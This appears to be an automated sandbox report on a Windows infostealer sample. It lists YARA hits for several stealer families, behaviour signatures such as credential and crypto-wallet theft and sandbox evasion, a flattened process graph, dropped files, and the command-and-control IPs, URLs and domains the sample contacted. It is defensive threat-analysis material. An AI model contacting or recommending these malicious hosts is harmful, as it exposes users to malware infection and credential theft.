Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Searches for user specific document files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: number of queries: 1081
Yara detected Credential Stealer
Source: Yara match File source: 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d361f35322.exe PID: 5772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 6636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5348, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: d361f35322.exe PID: 8200, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5348, type: MEMORYSTR
Yara detected Mars stealer
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.2151525456.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000003.2152173443.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2102303995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: 40.0.jok.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000000.2051081332.00000000007C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jok.exe PID: 8672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\jok[1].exe, type: DROPPED
Yara detected RisePro Stealer
Source: Yara match File source: 00000024.00000003.2840876152.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2839845792.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3354975509.0000000008152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3088709368.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3082656269.0000000007D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2839809905.0000000007CCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2840195887.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2839878527.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d361f35322.exe PID: 5772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 6636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: d361f35322.exe PID: 8200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 8964, type: MEMORYSTR
Yara detected SmokeLoader
Source: Yara match File source: 00000031.00000002.2229022734.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.2229087093.0000000003661000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.2151525456.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000003.2152173443.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2102303995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1436254 Sample: 1CMweaqlKp.exe Startdate: 04/05/2024 Architecture: WINDOWS Score: 100 237 Multi AV Scanner detection for domain / URL 2->237 239 Found malware configuration 2->239 241 Malicious sample detected (through community Yara rule) 2->241 243 29 other signatures 2->243 12 1CMweaqlKp.exe 5 2->12         started        16 MPGPH131.exe 2->16         started        18 RageMP131.exe 2->18         started        21 6 other processes 2->21 process3 dnsIp4 145 C:\Users\user\AppData\Local\...\explorta.exe, PE32 12->145 dropped 301 Query firmware table information (likely to detect VMs) 12->301 303 Tries to detect sandboxes / dynamic malware analysis system (registry check) 12->303 23 explorta.exe 2 23 12->23         started        305 Multi AV Scanner detection for dropped file 16->305 307 Detected unpacking (changes PE section rights) 16->307 309 Tries to steal Mail credentials (via file / registry access) 16->309 321 2 other signatures 16->321 161 34.117.186.192 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 18->161 163 104.26.5.15 CLOUDFLARENETUS United States 18->163 311 Tries to detect sandboxes and other dynamic analysis tools (window names) 18->311 313 Tries to harvest and steal browser information (history, passwords, etc) 18->313 315 Tries to evade debugger and weak emulator (self modifying code) 18->315 165 192.168.2.4 unknown unknown 21->165 167 239.255.255.250 unknown Reserved 21->167 317 Hides threads from debuggers 21->317 319 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 21->319 28 chrome.exe 21->28         started        30 chrome.exe 21->30         started        file5 signatures6 process7 dnsIp8 185 193.233.132.56 FREE-NET-ASFREEnetEU Russian Federation 23->185 187 193.233.132.139 FREE-NET-ASFREEnetEU Russian Federation 23->187 129 C:\Users\user\AppData\...\d361f35322.exe, PE32 23->129 dropped 131 C:\Users\user\AppData\Local\...\amert.exe, PE32 23->131 dropped 133 C:\Users\user\AppData\Local\...\random[1].exe, PE32 23->133 dropped 135 4 other malicious files 23->135 dropped 269 Query firmware table information (likely to detect VMs) 23->269 271 Creates multiple autostart registry keys 23->271 273 Tries to detect sandboxes / dynamic malware analysis system (registry check) 23->273 32 amert.exe 4 23->32         started        36 d361f35322.exe 1 60 23->36         started        39 ac861238af.exe 23->39         started        41 explorta.exe 23->41         started        189 142.250.189.14 GOOGLEUS United States 28->189 191 142.250.68.68 GOOGLEUS United States 28->191 195 5 other IPs or domains 28->195 193 142.250.72.131 GOOGLEUS United States 30->193 file9 signatures10 process11 dnsIp12 107 C:\Users\user\AppData\Local\...\explorha.exe, PE32 32->107 dropped 213 Detected unpacking (changes PE section rights) 32->213 215 Tries to evade debugger and weak emulator (self modifying code) 32->215 217 Tries to detect virtualization through RDTSC time measurements 32->217 233 3 other signatures 32->233 43 explorha.exe 45 32->43         started        169 147.45.47.93 FREE-NET-ASFREEnetEU Russian Federation 36->169 109 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 36->109 dropped 111 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 36->111 dropped 219 Tries to steal Mail credentials (via file / registry access) 36->219 221 Found many strings related to Crypto-Wallets (likely being stolen) 36->221 223 Found stalling execution ending in API Sleep call 36->223 235 3 other signatures 36->235 48 schtasks.exe 36->48         started        50 schtasks.exe 36->50         started        225 Antivirus detection for dropped file 39->225 227 Multi AV Scanner detection for dropped file 39->227 229 Binary is likely a compiled AutoIt script file 39->229 231 Machine Learning detection for dropped file 39->231 52 chrome.exe 39->52         started        file13 signatures14 process15 dnsIp16 205 185.172.128.19 NADYMSS-ASRU Russian Federation 43->205 207 77.221.151.47 INFOBOX-ASInfoboxruAutonomousSystemRU Russian Federation 43->207 209 193.233.132.234 FREE-NET-ASFREEnetEU Russian Federation 43->209 147 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 43->147 dropped 149 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 43->149 dropped 151 C:\Users\user\AppData\Local\...\install.exe, PE32 43->151 dropped 153 19 other malicious files 43->153 dropped 323 Detected unpacking (changes PE section rights) 43->323 325 Tries to detect sandboxes and other dynamic analysis tools (window names) 43->325 327 Tries to evade debugger and weak emulator (self modifying code) 43->327 329 3 other signatures 43->329 54 file300un.exe 43->54         started        57 NewB.exe 43->57         started        61 swiiiii.exe 43->61         started        67 4 other processes 43->67 63 conhost.exe 48->63         started        65 conhost.exe 50->65         started        file17 signatures18 process19 dnsIp20 249 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 54->249 251 Writes to foreign memory regions 54->251 253 Allocates memory in foreign processes 54->253 265 3 other signatures 54->265 69 RegAsm.exe 54->69         started        73 powershell.exe 54->73         started        197 185.172.128.59 NADYMSS-ASRU Russian Federation 57->197 199 104.21.84.71 CLOUDFLARENETUS United States 57->199 203 2 other IPs or domains 57->203 137 C:\...\4767d2e713f2021e8fe856e3ea638b58.exe, PE32 57->137 dropped 139 C:\Users\user\AppData\Local\...\toolspub1.exe, PE32 57->139 dropped 141 C:\Users\user\AppData\Local\...\ISetup8.exe, PE32 57->141 dropped 143 3 other malicious files 57->143 dropped 255 Creates an undocumented autostart registry key 57->255 76 ISetup8.exe 57->76         started        78 toolspub1.exe 57->78         started        80 schtasks.exe 57->80         started        257 Injects a PE file into a foreign processes 61->257 82 RegAsm.exe 61->82         started        86 2 other processes 61->86 201 185.215.113.67 WHOLESALECONNECTIONSNL Portugal 67->201 259 System process connects to network (likely due to code injection or exploit) 67->259 261 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 67->261 263 Installs new ROOT certificates 67->263 267 2 other signatures 67->267 84 rundll32.exe 67->84         started        88 2 other processes 67->88 file21 signatures22 process23 dnsIp24 171 189.195.132.134 MegaCableSAdeCVMX Mexico 69->171 183 9 other IPs or domains 69->183 113 C:\Users\...\zWIy5Pdf1kgq9YulaqIKrGGy.exe, PE32 69->113 dropped 115 C:\Users\...\v6zcDFD3cRDhmr34kNKDn8tX.exe, MS-DOS 69->115 dropped 117 C:\Users\...\v3efLAgS1BVue6uNuzFECLaH.exe, PE32 69->117 dropped 127 64 other malicious files 69->127 dropped 275 Loading BitLocker PowerShell Module 73->275 90 conhost.exe 73->90         started        173 185.172.128.228 NADYMSS-ASRU Russian Federation 76->173 175 185.172.128.90 NADYMSS-ASRU Russian Federation 76->175 177 176.97.76.106 INTRAFFIC-ASUA United Kingdom 76->177 119 C:\Users\user\AppData\Local\Temp\...\AsIO.dll, PE32 76->119 dropped 121 C:\Users\user\AppData\Local\...\ATKEX.dll, PE32 76->121 dropped 123 C:\Users\user\AppData\Local\...\ASUS_WMI.dll, PE32 76->123 dropped 125 C:\Users\user\AppData\Local\Temp\u6po.0.exe, PE32 76->125 dropped 92 u6po.0.exe 76->92         started        277 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 78->277 279 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 78->279 281 Maps a DLL or memory area into another process 78->281 295 2 other signatures 78->295 96 conhost.exe 80->96         started        179 104.21.67.211 CLOUDFLARENETUS United States 82->179 283 Query firmware table information (likely to detect VMs) 82->283 285 Creates HTML files with .exe extension (expired dropper behavior) 82->285 287 Found many strings related to Crypto-Wallets (likely being stolen) 82->287 297 2 other signatures 82->297 289 Tries to steal Instant Messenger accounts or passwords 84->289 291 Uses netsh to modify the Windows network and firewall settings 84->291 293 Tries to harvest and steal ftp login credentials 84->293 299 2 other signatures 84->299 98 powershell.exe 84->98         started        101 netsh.exe 84->101         started        181 13.89.179.12 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 86->181 file25 signatures26 process27 dnsIp28 211 185.172.128.150 NADYMSS-ASRU Russian Federation 92->211 155 C:\Users\user\AppData\...\freebl3[1].dll, PE32 92->155 dropped 157 C:\ProgramData\freebl3.dll, PE32 92->157 dropped 159 C:\Users\user\...\246122658369_Desktop.zip, Zip 98->159 dropped 245 Installs new ROOT certificates 98->245 247 Loading BitLocker PowerShell Module 98->247 103 conhost.exe 98->103         started        105 conhost.exe 101->105         started        file29 signatures30 process31
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
193.233.132.139
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false
185.172.128.90
 unknown Russian Federation
50916 NADYMSS-ASRU false
34.117.186.192
 unknown United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
185.215.113.67
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
193.233.132.175
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false
104.26.5.15
 unknown United States
13335 CLOUDFLARENETUS false
176.97.76.106
 unknown United Kingdom
43658 INTRAFFIC-ASUA false
193.233.132.56
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
142.251.2.84
 unknown United States
15169 GOOGLEUS false
193.233.132.234
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false
185.172.128.150
 unknown Russian Federation
50916 NADYMSS-ASRU true
185.172.128.59
 unknown Russian Federation
50916 NADYMSS-ASRU false
142.250.68.68
 unknown United States
15169 GOOGLEUS false
104.21.60.76
 unknown United States
13335 CLOUDFLARENETUS false
8.8.8.8
 unknown United States
15169 GOOGLEUS false
147.45.47.93
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false
104.21.67.211
 unknown United States
13335 CLOUDFLARENETUS false
104.21.90.14
 unknown United States
13335 CLOUDFLARENETUS false
77.221.151.47
 unknown Russian Federation
30968 INFOBOX-ASInfoboxruAutonomousSystemRU false
189.195.132.134
 unknown Mexico
13999 MegaCableSAdeCVMX false
172.67.169.89
 unknown United States
13335 CLOUDFLARENETUS false
185.172.128.228
 unknown Russian Federation
50916 NADYMSS-ASRU false
104.20.3.235
 unknown United States
13335 CLOUDFLARENETUS false
172.67.176.131
 unknown United States
13335 CLOUDFLARENETUS false
1.1.1.1
 unknown Australia
13335 CLOUDFLARENETUS false
13.89.179.12
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
172.217.14.67
 unknown United States
15169 GOOGLEUS false
104.21.84.71
 unknown United States
13335 CLOUDFLARENETUS false
104.21.18.166
 unknown United States
13335 CLOUDFLARENETUS false
31.41.44.147
 unknown Russian Federation
56577 ASRELINKRU false
185.172.128.19
 unknown Russian Federation
50916 NADYMSS-ASRU true
172.217.12.131
 unknown United States
15169 GOOGLEUS false
104.21.92.190
 unknown United States
13335 CLOUDFLARENETUS false
104.20.4.235
 unknown United States
13335 CLOUDFLARENETUS false
239.255.255.250
 unknown Reserved
unknown unknown false
172.67.19.24
 unknown United States
13335 CLOUDFLARENETUS false
142.250.72.131
 unknown United States
15169 GOOGLEUS false
142.250.189.14
 unknown United States
15169 GOOGLEUS false

Private

IP
192.168.2.4

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://trade-inmyus.com/index.php true
  • URL Reputation: safe
  • URL Reputation: safe
 unknown
pillowbrocccolipe.shop true
  • 18%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
185.215.113.67:26260 true
  • 16%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://185.172.128.150/c698e1bc8a2f5e6d.php true
  • 20%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
cleartotalfisherwo.shop true
  • 18%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://trad-einmyus.com/index.php true
  • URL Reputation: safe
 unknown
communicationgenerwo.shop true
  • 17%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
worryfillvolcawoi.shop true
  • 18%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
diskretainvigorousiw.shop true
  • 18%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://tradein-myus.com/index.php true
  • URL Reputation: safe
 unknown
affordcharmcropwo.shop true
  • 17%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
enthusiasimtitleow.shop true
  • 17%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown